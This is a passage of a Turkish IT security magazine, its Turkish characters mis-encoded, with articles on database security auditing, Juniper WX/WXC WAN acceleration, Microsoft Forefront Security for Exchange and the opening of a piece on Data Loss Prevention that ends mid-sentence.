(daha önce de belirtti¤imiz gibi uygulama katman›n›n temelini oluflturan web ve uygulama sunucu güvenli¤ini baflka bir
makalemizde ele almay› planl›yoruz). Bu yaz›m›zda veritabanlar›n›n güvenli¤ine yönelik konular› paylaflaca¤›z.
Web ve uygulama sunucular›nda oldu¤u gibi veritabanlar›n›n da güvenlik de¤erlendirmesi, koruma ve auditing hedefleri için kullan›labilecek bir çok teknik mevcuttur. Bunlar
aras›nda veritaban› kullan›m›n›n gözden geçirilmesi, zafiyet
taramas›, kesin s›n›rlarla belirlenmifl eriflim kontrolleri, yamalar›n zaman›nda geçilmesi ve testi, sunucu s›k›laflt›rma ifllemleri, sütun ve/veya alan bazl› flifreleme ve audit analizleri say›labilir.
Bu noktada, yukar›daki kapsaml› veritaban›/bilgi güvenli¤i
projesinin anahtar bileflenleri sorular›na geri dönelim isterseniz. Hassas bilginin hangi bilgiler oldu¤una ve nerede bulundu¤una nas›l karar veririz? Bu noktada birkaç de¤iflik
yaklafl›m olabilir:
1. En basiti sormakt›r. ‹fl birimi sahiplerinize, DBA’lerinize vs.
bu bilginin ne oldu¤unu ve nerede oldu¤unu sorabilirsiniz.
“Sizin için hangi veritabanlar›ndaki hangi bilgiler kritik?
Hangisinin korunmas›na ihtiyaç var?” Sorun flu ki ilgili muhataplar› buldu¤unuzu var saysak bile ne kadar h›zl› ve do¤ru cevap alaca¤›n›z tart›fl›l›r olacakt›r.
2. DBA’lerinizin yard›m› ile sahip oldu¤unuz tüm veritabanlar›n› iyice bir gözden geçirirsiniz. Bu metot, sonuçlar› itibar› ile veritaban› güvenli¤i aç›s›ndan oldukça do¤ru kararlar
alman›z› sa¤lar ancak takdir edilece¤i üzere çok zaman al›c›
bir ifllemdir ve büyük kurumlarda sahip olunan veri miktar›
düflünüldü¤ünde hiç de pratik bir çözüm de¤ildir.
3. Baz› hassas patern'leri filtreleyerek sonuca ulaflmay› de-
neyebilirsiniz. Örne¤in VTYS üzerinde kredi kart› numaras›,
kullan›c› kimlik bilgileri vs. gibi patern'leri filtreleyecek araçlar çal›flt›r›p bu tip verilerin hangi tablolarda, veritabanlar›nda oldu¤unu keflfedersiniz.
4. SAP, PeopleSoft vs. uygulamalarda haz›r bulunan ön tan›ml› listeleri kullan›p kurumsal anlamda sizin için önem arz
eden bilgilerin nerelerde depoland›¤›n› bulmaya çal›flabilirsiniz.
Asl›nda bunlar›n hepsi kendi içinde bir auditing ifllemidir ve
yukar›daki metotlar›n hepsinde ortak olarak gözüken problem ise bilgilerinizin (bilhassa büyük kurumsal ortamlarda)
çok de¤iflken olmas›ndan dolay› bu yapt›¤›n›z ifllerin s›k s›k
yenilenmesi gere¤idir. Ortam›n›zdaki de¤iflikliklerin takibini
nas›l yapacaks›n›z? Bu baflar›ya giden yolda önemli bir husustur ve genellikle “De¤ifliklik Yönetim Sistemleri” (change
control tools) bu noktada bize yard›mc› olabilir. Elbette söz
konusu de¤ifliklik takip sistemlerinin nihai olarak kuraca¤›m›z veritaban› güvenlik sisteminin içine bir otomatik auditing arac› flemsiyesi alt›nda entegre olmas›n› bekleriz çünkü
bu bizi en ideal duruma biraz daha yaklaflt›rm›fl olacakt›r.
Normal aktiviteyi nas›l tespit edece¤iz sorusuna dönelim.
Yani normal flartlar dahilinde veritabanlar›m›zdaki kurumsal
bilgilere nas›l erifliliyor? Bu noktada da biraz öncekine benzer flekilde birkaç de¤iflik yaklafl›m olabilir:
1. Gene ilgili birimlere sorma yolunu seçebilirsiniz. Avantaj
ve dezavantajlar›na yukar›da k›saca de¤inmifltik.
2. Bilginin sadece uygulamalardan gelece¤ini var sayarak
söz konusu uygulama kodunuzu gözden geçirirsiniz. Bu oldukça iyi bir yöntemdir ancak pratik de¤ildir çünkü söz konusu kodlar çok büyüktür, baflkas›ndan sat›n al›nm›flt›r, size
açmazlar vs.
3. Sahip oldu¤unuz VTYS’nin Auditing imkanlar›n› devreye
al›p normal aktivitenin ne oldu¤unu takip etmeye çal›flabilirsiniz. Ama bunu yapt›¤›n›zda k›sa zamanda milyonlarca sat›r log ile karfl› karfl›ya kalabilirsiniz (bunlar›n nerede depolanaca¤›, nas›l analiz edilece¤i ise ayr› bir sorundur). Burada
da sahip olaca¤›n›z nihai güvenlik çözümün içine entegre olmufl bir otomatik auditing arac› oldukça faydal› olacakt›r.
Bu noktada yukar›da birkaç de¤iflik vesile ile de¤indi¤imiz
otomatik auditing arac›n›n temel baz› özelliklerinden bahsedelim. Sahip olaca¤›m›z (ya da olmam›z gereken) otomatik
auditing arac›n›n 5N1K hakk›nda bize bilgi vermesini bekleriz:
Kim: Kullan›c›lar hangi kullan›c› ad›yla veritabanlar›m›za
ba¤lan›yor? Client-side iflletim sistemi üzerindeki (örn. Win-
dows domain’lerindeki) hangi kullan›c›lar, veritaban› sistemimize hangi kullan›c› ad› ile erifliyor ve ayn› hesab› (örne¤in “sa” veya “test”) birden fazla kifli paylafl›yor mu? Kullan›c›lar›m›z›n hangileri, hangi hassas bilgilere erifliyor?
Nerede(n): Nereden, hangi IP’den geliyorlar? Dinamik IP yönetimi yap›lan ortamlarda (DHCP vs.) hangi hostname’lerden eriflim var?
Ne: Hangi tablolar üzerinde hangi sorgular› yap›yorlar (ne
yap›yorlar)? Yapt›klar› sorgular›n ortak özellikleri ve detaylar› nedir?
Ne zaman: Eriflim ne zaman yap›l›yor? Mesai saatleri dahilinde mi, hafta sonu mu, sadece sene sonunda bir gece yar›s› m› (batch job) vs.?
Neden: Bir otomatik audit arac› buna tek bafl›na karar veremez ama güvenlik yöneticileri olarak bizim olan biteni anlamam›za yard›mc› olur. Hangi veritabanlar›na ve flemalarla ifl
yap›yorlar?
Nas›l: Hangi protokol üzerinden geliyorlar (stunnel? Cleartext port 1521)? Ya da PC’lerde yüklü bir uygulama ile mi
(örn. TOAD.exe), yoksa bir uygulama içinden mi (örn. Oracle Application Server)? Söz konusu kullan›c›lar›n ayr›cal›kl›
operasyonlar (drop table, backup vs.) yapmaya ihtiyac› var
m›?
Son olarak da var olan (ya da var olmas› muhtemel) zafiyetleri nas›l tespit edece¤iz sorusuna metodik yaklafl›m seçeneklerimizi gözden geçirelim:
1. Veritabanlar›m›z üzerinde zafiyet tarama araçlar› kullanabiliriz. Piyasada birçok araç var bu konuda. Baflka bir deyiflle, boksör antrenörü örne¤ini hat›rlarsak, sürekli olarak
muhtemel zay›f noktalar› bulmak için veritabanlar›m›z› yumruklayabiliriz. Güvenlik yöneticilerinin en sevdikleri metotlar›n bafl›nda bu gelmektedir.
2. Büyük bir sab›rla, tüm veritaban› sistemleriniz üzerinde
ince ayarlar ve kontroller yapabilirsiniz. Sistem parametreleri, registry kay›tlar›/de¤erleri incelemesi vs. yap›p muhtemel ve/veya bilinen aç›klar hakk›nda ipucu arars›n›z. Bu ifllem genellikle bir veritaban› uzman›n›n kat›l›m›n› da gerektirir.
3. Pasif de¤erlendirme yapabilirsiniz. Bu ifllem genellikle audit trail dosyalar›n›n veya sistem konfigürasyon dosyalar›n›n incelenmesini ve buralarda zay›fl›klar bulunmas›n› hedefler. Örne¤in düzenlemeyi unuttu¤unuz varsay›lan kullan›c› hesaplar› (default accounts), parolas› olmayan kullan›c›
hesaplar› (Joe accounts), SQL Injection’a aç›k vulnerable
query’lerin tespiti vs. Bu konuda da piyasada ücretli/ücretsiz bir çok araç var.
Devam edecek...
Murat ÖZDEM‹R
[email protected]
A¤ ve Uygulama H›zland›rma
uniper WX/WXC platformlar› WAN üzerinde uygulamalar› s›k›flt›rma, protokol h›zland›rmas›, bantgeniflli¤i yönetimi , rota optimizasyonu ve raporlama tekniklerini entegre ederek LAN performans›nda çal›flmas›n› sa¤lar. WX/WXC platformlar› WAN kapasitesini yedek transmisyonu eleyerek, TCP ve uygulama tabanl› protokolleri h›zland›rarak (CIFS, MAPI, HTTP dahil), bantgeniflli¤i kullan›m›n› önceliklendirerek,
farkl› rotalardan giden uygulama ak›fl›n›
optimize ederek WAN kapasitesini artt›r›r. WXC platformlar› ayr›ca üzerindeki
sabit disk sayesinde daha uzun trafik
flablonu tutarak zaman içerisinde daha
yüksek oranda trafik s›k›flt›rmas› sa¤lar.
J
bu flekilde WAN hat kapasitesinden geçebilecek gerçek trafi¤in ve uygulama performanslar›n›n artmas› en h›zl› bir flekilde sa¤lanm›fl olur.
Application Flow Acceleration
(Application-Specific Acceleration)
Application Flow Acceleration (AppFlow) tekni¤i, WAN gecikmesi taraf›ndan etkilenen uygulamalar› saydam olarak
h›zland›r›r.
AppFlow tekni¤i özellikle 3 protokolde etkilidir: Microsoft
Exchange taraf›ndan kullan›lan Messaging Application Programming Interface (MAPI), Microsoft dosya servisinin kulland›¤› Common Internet File System (CIFS), ve HTTP.
fiekil-1 Uygulama baz›nda trafik s›k›flt›rma de¤erleri
WX/WXC platformlar›n›n kulland›¤› teknikler sayesinde
WAN hatlar› üzerindeki karfl›l›k verme kapasitesi artar; örne¤in TCP tabanl› uygulamalarda 5 kata kadar, Microsoft
Exchange ve Windows dosya paylafl›m›nda 100 kata kadar.
WX/WXC platformlar›n›n kulland›¤› teknikler ve özellikleri flu
flekildedir:
Molecular Sequence Reduction (SIKIfiTIRMA)
Molecular Sequence Reduction (MSR), WX/WXC platformlar›n›n en önemli s›k›flt›rma algoritmas›d›r. Patentlenmifl olan
bu teknik, kurumlar›n WAN data hatlar›n› 10 kata kadar kapasiteyle kullanmas›n› sa¤lamaktad›r. Bu teknik, paketlerin
DNA’s›n› inceleyerek efllefltirme yapmaktad›r. MSR, tekrarlanan veri flablonlar›n› tan›r ve bunlar› etiketlerle de¤ifltirir.
MSR tekni¤i tamam›yla cihaz›n haf›zas› üzerinde çal›flmaktad›r ve bu tekni¤in sözlü¤ü yüzlerce megabyte’l›k veri flablonlar›n› tutabilir.
Active Flow Pipelining – TCP performans›n›, TCP ba¤lant›lar›n› yerel olarak sonland›rarak art›ran bir tekniktir. Bu teknik
sayesinde yüksek bantgeniflli¤i veya yüksek gecikmeli ba¤lant› gereksinimi duyan uygulamalar h›zlan›r.
Forward Error Correction – Kay›plar›n yafland›¤› hatlarda yinelenen paketleri eleyen bir tekniktir.
Network Sequence Caching
Network Sequence Caching, patent bekleyen WXC platformlar›nda olan bir tekniktir. Bu teknik t›pk› MSR s›k›flt›rma tekni¤inde oldu¤u gibi data flablonlar›n› IP seviyesinde tan›r ve
etiketlerle de¤ifltirir. MSR tekni¤inden fark›, haf›zada de¤il
sabit diskte gerçekleflmesidir. Bu teknik MSR tekni¤inden
daha uzun veri flablonlar›n› gözlemlemesi ve aradan yüzlerce gigabyte data ve/veya haftalar geçse bile veri flablonlar›n› tan›yabilmesidir.
Packet Flow Acceleration (TCP Acceleration)
Packet Flow Acceleration (PFA), WAN üzerindeki TCP performans›n› artt›r›r.
WX/WXC platformlar›nda uygulamalar›n önem derecesini
ve/veya bantgeniflli¤i atamas›n› belirtebilirsiniz. WX/WXC
platformlar› sadece IP veya ToS/DiffServ bilgisine de¤il 7.
seviye uygulama bilgisine göre de s›n›fland›rma yapabilir.
Örne¤in, 3. seviyede (Network) tüm Citix uygulamalar› ayn›
gözüktü¤ü için SAP trafi¤ini yaz›c›ya gönderilen ifllemden
ay›rmak için 7. seviye bilgisine ihtiyaç duyulmaktad›r.
Exchange ve dosya servislerinde veri iletiflimi küçük bloklar
fleklinde iletilmektedir ve bir ifllemin tamamlanmas› için yüzlerce hatta binlerce ACK gerekebilir. O yüzden 20ms, 30ms
gibi gecikme olan hatlarda performans ve üretkenlik düflmektedir. Yine benzer flekilde HTTP uygulamas›nda bir sayfan›n yüklenmesi için düzinelerce RTT (round-trip-time) gerekebilir.
Policy-Based Multipath (Path Optimizasyonu)
AppFlow tekni¤i, veri bloklar›n› ve web objelerini biriktirip
WAN kapasitesini dolduracak flekilde gönderir. Bu ifllemin
sonucunda uygulama perfromans›nda 3 ile 100 kat› aras›nda geliflme sa¤lar.
WX/WXC platformlar›nda 2 hatta sahip lokasyonlarda uygulamalar›n hangi hatt› kullanaca¤›n› bu yetenek sayesinde
belirleyebilirsiniz. Sistem, hatlar›n performanslar›n› izleyerek, zaman içerisinde performans›n kabul edilebilir seviyelerde olmamas› durumunda otomatik olarak di¤er hatt› kullanmas›n› sa¤layabilir.
Raporlama
WAN ve uygulama performans›n› art›rmak için öncelikle a¤
içerisinde hangi trafik tiplerinin oldu¤unu, farkl› uygulamalar›n ne kadar bantgeniflli¤i kulland›¤›n›, a¤ içerisinde s›k›flma yafland›¤› durumda performans›n nas›l etkilendi¤ini iyi
analiz etmeniz gerekir.
MSR s›k›flt›rma yetene¤i farkl› uygulama tiplerinden faydalan›r. Hem k›sa, yo¤un data trafi¤i yaratan uygulamalar›n
trafiklerini (Örnek: Citrix, HTTP), hem de uzun veri flablonlar› yaratan trafikleri (Örnek: Word dosyas›) etkili bir flekilde azalt›r. MSR sözlük tabanl› oldu¤u için tekrarlanan flablonlar› uzun baflka veriler aras›nda kalsa bile azalt›r. MSR
s›k›flt›rmas›n›n WAN hatlar›n› rahatlatmas› çabuk gözlenir,
PFA içeri¤i flu flekildedir:
QoS (Bantgeniflli¤i Yönetimi)
Fast Connection Setup – K›sa ömürlü ba¤lant›lar›n performans›n›, TCP ba¤lant› kurulumunun round-trip zaman›n›
eleyerek sa¤lar, bu flekilde HTTP gibi uygulamalar h›zlan›r.
Bantgeniflli¤i yönetimi hem Quality of Service (QoS) yetene¤ini hem de kritik ve gecikmeye duyarl› uygulamalar için
bantgeniflli¤i atamas›n› içermektedir.
WX/WXC platformlar› iki ana yaz›l›m arac› sayesinde bu yetkinli¤i sa¤lar. WebView yaz›l›m› cihaz›n içerisinde yer alan,
cihaz bafl›na konfigürasyon, yönetim ve trafik gözlemlemesinin yap›labildi¤i bir araçt›r. WX Central Management
System (CMS) yaz›l›m› ise tek bir noktadan tüm WX/WXC
platformlar›n›n konfigürasyon, yönetim ve trafik gözlemlemesinin yap›labildi¤i bir araçt›r.
Mehmet ÜNER
[email protected]
Forefront Security for Exchange Server
eyaz fiapka’n›n Kas›m say›s›nda Exchange 2007 ile gelen güvenlik özelliklerinden bahsetmifltik. Bu güvenlik
özellikleri d›fl›nda Exchange 2007’yi korumak için flu anda kullan›labilecek Anti-virüs ve Anti-Spam yaz›l›mlar›ndan biri
de “Microsoft Forefront Security for Exchange Server”. Microsoft Antigen for Exchange Server’in yeni versiyonu olan bu yaz›l›m, sadece Exchange 2007’ye kurulabiliyor. Exchange 2003
ve 2000 sunucular› ise Microsoft Antigen for Exchange Server
korumaya devam ediyor. Kas›m ay›nda Forefront sunucu ailesinin lansman› yap›lan di¤er ürünü de Forefront Security for Sharepoint. Forefront sunucu ailesi 2007 y›l› içinde gelecek olan
Forefront Security for Office Communications ile tamamlanm›fl
olacak. Böylece e-posta sunucular›, an›nda mesajlaflma sunucular› ve portal sunucular› Forefront sunucu ailesiyle birlikte, gittikçe ak›ll› hale gelen ve uygulamalar› hedef almaya bafllayan
kötü niyetli sald›r›lara karfl› koruma alt›na girmifl olacaklar.
B
Forefront Sunucu ailesinin en önemli özelli¤i, ister Sharepoint’i
ister Exchange sunucular› ister an›nda mesajlaflma sunucular›n› koruyor olsun, bu korumay› en üst düzeye ç›karmak için endüstrinin önde gelen güvenlik firmalar›ndan sa¤lanan tarama
motorlar›n› tek bir çözümde birlefltirilmifl olmas›d›r. Böylece gelen bir e-posta, sharepoint sitesine yüklenen bir doküman veya
an›nda mesajlaflmadaki dosya transferleri tek bir anti-virüs motoru yerine, 9 ayr› motor taraf›ndan kontrol edilebiliyor (fiekil 1).
Bu da, korumay› oldukça yüksek bir seviyeye ç›kar›yor.
2006’da kurumlar›n yaklafl›k yüzde 97’si, virüslerden koruma
yaz›l›m› kullanmalar›na ra¤men, yüzde 65’i virüs sald›r›lar›ndan
zarar gördü(*). Buna neyin sebep oldu¤u sorusunu kendimize
sorarsak en önemli sebebin, kurumlar›n tek bir tarama motoruna sahip anti-virus yaz›l›mlar› kullanarak kritik görev sunucular›n› korumaya çal›flmalar› oldu¤unu görürüz. E¤er bu motor, en
son riskleri h›zla tan›makta baflar›s›z olursa, veya o motora güncelleme gelifltiren anti-virüs laboratuvar› bir virüs sald›r›s› s›ras›nda güncellemede geç kal›rsa, virüsler kurumlar›n kritik sunucular›na zarar verebilir. Bu senaryo Forefront sunucu ailesinde
geçersiz oluyor, çünkü Forefront sunucu ailesi ön yüzünde Microsoft olmas›na ra¤men 9 ayr› anti-virüs motoru sayesinde 9 la(*) CSI/FBI 2006 Anketi
boratuvar›n gücünü kurumlara sunuyor (flekil 2). Böylece virüsler bir motoru atlat›rlarsa di¤er motor taraf›ndan yakalan›yorlar, bir laboratuvar güncellemede gecikirse, di¤er laboratuvar
bu aç›¤› kapat›yor. Belki de hepsinden güzeli, ön yüzde sadece
Microsoft oldu¤u için motorlar›n bütün güncellemeleri ve ihtiyaç duyulan destek tek bir noktadan gelebiliyor. 9 ayr› motora
sahip olman›n avantajlar›ndan biri de güncellefltirmeler boyunca kesintiye u¤ramayan posta ak›fl›. Normal bir anti-virüs çözümünde güncellefltirme yap›laca¤› zaman e-postalar bekletilir ve
tarama motoru için imza güncellefltirmesi yap›l›r. Forefront Sunucu ailesinde ise sahip olunan birden fazla motor çözümü ile,
bir motor güncellefltirme için çevrimd›fl› oldu¤unda bile di¤er
motorlar e-posta taramalar› için kullan›labilir.
fiekil 2 – Forefront Anti-virüs Motorlar›
Yaz›n›n geri kalan›nda Forefront Security for Exchange Server
üzerinde biraz daha fazla dural›m. Özellikle Exchange Server
2007’ye geçifl yapmay› düflünen kurumlar için güvenlik aç›s›ndan oldukça önemli bir çözüm. Exchange Server 2007 beta sürümleri ile birlikte Forefront Security for Exchange Server’in
beta sürümlerinin ç›kmas›, Microsoft’un güvenli¤e yeni bak›fl›n›n bir parças›. Kritik uygulamalar daha beta aflamas›ndayken,
özel olarak tasarlanm›fl güvenlik ürünleri ile koruma alt›na al›nabildiler. Ve yeni sunucu uygulamalar› piyasaya ç›kt›¤› anda
güvenlik ürünlerinin de son sürümleri haz›rd›.
plan taramalar› için zaman ve posta kutusu tan›mlar›n›n yap›labilmesi. Böylece virüs tafl›ma olas›l›¤› yüksek posta kutular› veya sadece son zamanlarda gelen e-posta’lar kontrol edilebilir.
Geriye dönük bütün posta kutular› taranmad›¤› için performans
kayb› yine engelleniyor. Forefront ayn› zamanda taramalar›n›
bellek içinde yap›yor. Tarama ifllemi için disk kullan›lmad›¤›ndan
ifllem çok daha h›zl› oluyor ve veri birikimi engelleniyor. Bununla beraber, birden fazla tarama ifllemi (daha fazla postay› tek bir
seferde ifllemek için) kullanabilme olas›l›¤›, sunucu performans›n› oldukça gelifltiriyor.
Exchange Server 2007, yeni sunucu rolleri ile gelifltirildi. Bunlar
Edge, Hub, Mailbox, Client Access ve Unified Messaging rolleri.
Forefront Security for Exchange Server bu rollerin hepsi üzerine kurulabilir ve Exchange Sistemlerini koruyabilir. Farkl› rollerin olmas› Exchange Sistemi için ayn› zamanda performans artt›r›c› bir özellik. Farkl› rollere sahip sunucular, kurum içinde çok
daha iyi bir ölçeklenme sa¤layabiliyorlar. Bu ayn› zamanda virüs sistemi için de performans artt›r›c› bir özellik. Çünkü mesajlar, Forefront ile ilk rolde tarand›ktan ve güvenli olduklar›na karar verildikten sonra di¤er rollerde Exchange 2007 ile entegre
çal›fl›larak tarama yap›lmas›na gerek kalm›yor. Tekrar tekrar tarama olmaks›z›n e-postalar daha h›zl› ak›yor ve sunucular afl›r›
yükten dolay› performans kayb› yaflam›yorlar. Performans› artt›r›c› özelliklerden biri de Mailbox sunucular›nda yap›lan arka
Performans konusu aç›ld›¤› zaman akla gelen ilk fleylerden biri de
Forefront içindeki 9 tarama motorunun beraber çal›flmas›n›n performans› nas›l etkileyece¤idir. Bunun için Forefront içinde “Bias”
ayarlar› bulunmaktad›r (fiekil-3). Bias ayarlar›na örnek olarak
maksimum güvenlik, maksimum performans ve ‘neutral’ verilebilir. Maksimum güvenlik k›sm›nda seçilen bütün anti-virüs motorlar› ayn› anda kullan›l›r. Maksimum performans k›sm›nda ise seçilen motorlar›n sadece %25’i kullan›l›r. Ayn› flekilde ‘neutral’ ayar›nda seçilen motorlar›n %50’si kullan›l›r. Forefront’un anti-virüs
motorlar›n› seçimi ise özel algoritmalara dayan›r. Örnek olarak 4
motor ve ‘neutral’ ayar› seçilmiflse, gelen bir e-posta iki motor taraf›ndan taran›r. Bu motorlar geçmifl performanslar›na, hangisinin daha fazla virüs yakalad›¤› ve en son güncellemeleri ne zaman yapt›¤›na göre seçilir. Böylece en iyi performans gösteren
motorlar kuruma gelen e-postalar› taram›fl olurlar.
fiekil 1 – Forefront Sunucu Korumas›
Anti-virüs kadar birçok kurumun s›k›nt› yaflad›¤› baflka bir konu
ise istenmeyen e-posta’lar. Bu kategori içerisinde spam, içerikleri kötü olan, veya istenmeyen eklentilere sahip olan e-postalar
gösterilebilir. Forefront Security for Exchange Server, üst düzey
içerik filtresi ile istenmeyen e-postalara karfl› etkin bir koruma
sa¤lar. Eski deneyimlerden yararlanarak problem çözme (deneyimsel) yöntemleri ve dosya filtreleme teknolojileri, tehlikeli dosyalar› –örne¤in çal›flt›r›labilir dosyalar- uzant›lar› de¤iflmifl olsa
bile yakalayarak kurumlar› istenmeyen e-postalardan korur. Ay-
fiekil 3 – Forefront Bias Ayarlar›
n› flekilde spam korumas› taraf›ndaysa Microsoft IP Reputation
Servisi, içerik filtreleme için Intelligent Message Filters (IMF) ve
spam imza dosyalar› gibi özellikler bulunmakta. Asl›nda Exchange 2007’nin içinde bulunmalar›na ra¤men, bu üst düzey istenmeyen e-posta koruma hizmetleri, sadece Forefront Security for
Exchange Server lisans› ile etkinlefltirilebilir. ‹stenmeyen e-postalara karfl› koruma araçlar›, sürekli olarak etkin haldedir ve her
gün birkaç kez otomatik olarak güncellefltirilir.
Anti-virüs yaz›l›mlar›n›n en önemli sorunlar›ndan biri de yönetim zorluklar›d›r. Forefront Security for Exchange Server ile bu
sorun da ortadan kalk›yor. Kendi yerleflik yönetim konsolu d›fl›nda, web tabanl› Microsoft Forefront Server Security Management konsolu ve Microsoft Operations Manager (MOM) entegrasyonu ile yönetim oldukça kolaylafl›yor. Basitlefltirilmifl bir
arayüz sunan yönetim konsolu üzerinden Forefront’un bütün
ayarlar› yap›labiliyor. Yönetim konsolu ile sunucular lokalden
veya uzaktan yönetilebiliyor. Merkezi web tabanl› yönetim sayesinde ise merkezi yap›land›rma, yerlefltirme ve güncellefltirme sa¤lan›yor. Ayn› zamanda birden fazla sunucu uzaktan kolayca yönetiliyor ve kapsaml› raporlar oluflturulabiliyor.
Son olarak belki de lisanslamadan bahsetmek gerekiyor. Forefront Security for Exchange Server lisans› ile Exchange 2007 sunucular›n› korumak d›fl›nda, ayn› zamanda Microsoft Exchange
Server 2003 ve Microsoft Exchange Server 2000 ortamlar›n›n
korunmas›na yard›mc› olmak için Microsoft Antigen for Exchange, Microsoft Antigen for SMTP Gateways ve Antigen Spam Manager kullanmalar› için de lisanslanm›fl oluyor.
Özetle Forefront sunucu ailesi, kurumlar›n kritik uygulama sunucular›n› tam bir koruma alt›na al›yor ve kendine özel teknolojilerle güvenlik seviyesini en üst düzeye ç›kar›yor. Microsoft’un
güvenli¤e bak›fl›n›n önemli bir parças› olan Forefront sunucu ailesi, anti-virüs sektörünün en önemli oyuncular›ndan biri olacakm›fl gibi görünüyor.
Sinan YILMAZ
[email protected]
Data Loss Prevention
(DLP)
BEYAZ APKA OF S N ZE GELD , S ZE TESL M ED LD . S Z DE (UMARIZ) SABIRSIZLIKLA
B LG SAYARINIZIN BA INDA BEYAZ APKA’YI OKUMAYA BA LADINIZ. PEK ,
ÖNÜNÜZDEK B LG SAYARDA NE G B ÖNEML B LG LER VAR?
roje dokümanlar›, bütçe dosyalar›, rakip analizleri,
personel giderleri, teknik dokümanlar, fiyat listeleri,
araflt›rma gelifltirme çal›flmalar› vs… Hepimizin çok
de¤erli bilgilerini tafl›yor art›k bilgisayarlar. Hem kendimiz
hem de flirketimiz için de¤erli bilgiler. De¤erli veri bilgisayarlardan çeflitli yöntemlerle çal›n›rsa ya da iyi niyetli oldu¤unu söyleyemeyece¤imiz flirket çal›flanlar› taraf›ndan rakiplerimize s›zd›r›l›rsa zarar›m›z ne olur?
P
Bu yaz› “Hiçbir fley olmaz can›m” diyenler için de¤ildir.
Bahsetti¤im riskleri önlemek birço¤umuzun proje listesinde
duruyor. Asl›nda arad›¤›m›z fleyin tam ad› Data Loss Prevention.
Nedir?
Data Loss Prevention, son zamanlarda bilgi güvenli¤i sektöründe ad›ndan s›kça bahsedilen bir terim. Temel anlam› bilgi kayb›n›n engellenmesi oldu¤u için ço¤u zaman yanl›fl anlafl›lmalara da neden olan DLP, sektörde standartlaflmaya
bafllayan bir tabir oldu. Genifl olarak bakarsak bir antivirus
yaz›l›m› da bilgi kayb›n› engeller bir yedekleme yaz›l›m› da.
Ancak DLP terimi baflka bir mecraya do¤ru gidiyor. ‘Gidiyor’
diyorum çünkü DLP sektörde de¤iflmez bir standart isim haline henüz gelebilmifl de¤il. Öyle ki bu yaz›y› yazd›¤›mda wikipedia ve kutsal bilgi kayna¤›(?) ekfli sözlük Data Loss Prevention teriminin karfl›l›¤›n› henüz ö¤renememiflti. Ayr›ca
Gartner ve benzeri araflt›rma kurumlar›nda DLP ad›nda bir
kategori de henüz bulunmuyor. Sözünü edece¤im DLP ürünleri baz› raporlarda içerik izleme ve filtreleme gibi kategorilerde yer alabiliyorlar.
Data Loss Prevention, bilgi güvenli¤inde de¤erli verilerin
baflkalar›n›n eline geçmesini engellemek üzere tasarlanm›fl
teknolojiye verilen bir isimdir.
Ne yapar?
DLP teknolojisi verinin kayna¤› ile ilgilenir. Özel
kullan›c›lar için ekstra yetkiler tan›mlanabilmesine karfl›n genel olarak bilgi koruma mant›¤›
ayn›d›r. Hatta baz› ürünlerde güvenilir kullan›c› tan›m› bulunmaz.
Merkezi olarak yönetilen DLP sistemi, önceden tan›mlanm›fl kaynaklar› koruma alt›na al›r. Korunan kaynaklar üzerinde yap›lan
tüm ifllemler raporlan›r ve kayna¤›n güvenlik gözü ile izlenmesine imkân sa¤lan›r.
DLP ürünlerinin tamam› girifl/ç›k›fl ayg›tlar›n›n denetimini
yapabilir. De¤erli verinin uygulamalar üzerinden (email,
webmail, IM, P2P, Skype), a¤ sistemleri üzerinden (wi-fi, bluetooth, http(s), ftp), fiziksel ayg›tlar üzerinden (yaz›c›lar,
usb haf›zalar, faks, cd/dvd) baflka sistemlere gönderilmesini
engeller.
DLP veriyi korumaya yönelik gelifltirildi¤i için hack edilmifl,
Truva at› bulaflm›fl, güvenlik zaaf› bulunan veya hatal› konfigüre edilmifl bilgisayarlardan veri çal›nmas›n› engeller. Baz›
DLP ürünleri için kullan›c›n›n nerede oldu¤u önemli de¤ildir.
Tafl›nabilir bilgisayarlar flirket a¤›nda de¤ilken bile agent mimarisi sayesinde koruma kalkan›n› her zaman çal›flt›rabilir.
DLP ürünleri sunucu sistemlerinde, istemcilerde, tafl›nabilir
bilgisayarlarda, Blackberry gibi avuçiçi bilgisayarlarda çal›flt›r›labilir. Tüm DLP sistemi da¤›t›k ortamlarda olmas›na ra¤men merkezi olarak yönetilebilir ve raporlanabilir. DLP
ürünleri de¤iflik biçimlerde bulunan kaynaklar› koruyabilir.
fiifrelenmifl dosyalar, klasörler, bilgi bankalar›, s›k›flt›r›lm›fl
dosyalar koruma alt›na al›nabilir.
Ne de¤ildir?
Data Loss Protection bilgi güvenli¤i sektöründe tam bir
standarda kavuflmufl bir tabir de¤il. DLP oldu¤unu iddia
eden ancak pek DLP kategorisine koyamayaca¤›m›z birkaç
örnek verelim:
Key Logger Yaz›l›mlar›
DLP oldu¤unu iddia eden bir ürün bilgisayarlar üzerinde dedektif gibi çal›fl›yor. Bilgisayarda girilmifl her veriyi gizlice
kay›t ediyor ve sistem yöneticisi (ya da patron) bu bilgileri
görebiliyor. Üstelik baz› önemli kelime
ya da dosyalar›n ifllem görmesi s›ras›nda yöneticilere otomatik bir gerçek zamanl› uyar› gönderilebiliyor. Ancak bu
ürünleri genel DLP kategorisine almamak gerekir.
Yedekleme Yaz›l›mlar›
Baz› ürünler dokümanlar›n güvenli¤ini sa¤lamak için, dokümanlar›n her sürümünün
bir yede¤ini tutar. De¤ifltirilen bir doküman›n hem yeni hem de eski sürümleri sistem
taraf›ndan yedeklenir. ‹htiyaç duyuldu¤u anda dosya istenilen sürüme geri dönülebilir. Ancak bu yaz›l›mlar›n DLP olarak adland›r›lmas› pek do¤ru say›lmaz. Bu yaz›l›mlar gelifltirilmifl yedekleme yaz›l›mlar›d›r.
Kurtarma Yaz›l›mlar›
Zarar görmüfl ve bozulmufl dosyalar› kurtarmaya yarayan
yaz›l›mlardan baz›lar›, DLP teriminin bilgi güvenli¤i sektöründe güncel bir terim haline gelmesi sebebi ile bu terimi
kullanmaya bafllad›lar. Ancak kurtarma yaz›l›mlar›n›n hiçbiri
sözünü etti¤imiz DLP kategorisine girmez.
DLP oldu¤unu iddia etmemesine karfl›n, DLP ifllevleriyle kar›flt›r›lan baz› teknolojiler de var. Kar›flt›r›lmasalar bile farklar›n k›saca üzerinden geçmek faydal› olacakt›r diye düflünüyorum ve birkaç örnek vermek istiyorum.
Digital Rights Management (DRM)
Data Loss Prevention bir Digital Rights Management ürünü
de¤ildir. DRM verileri flifreli biçimde tutabilir ve daha önceden güvenli biçimde tan›mlanm›fl kullan›c›lara özel yetkiler
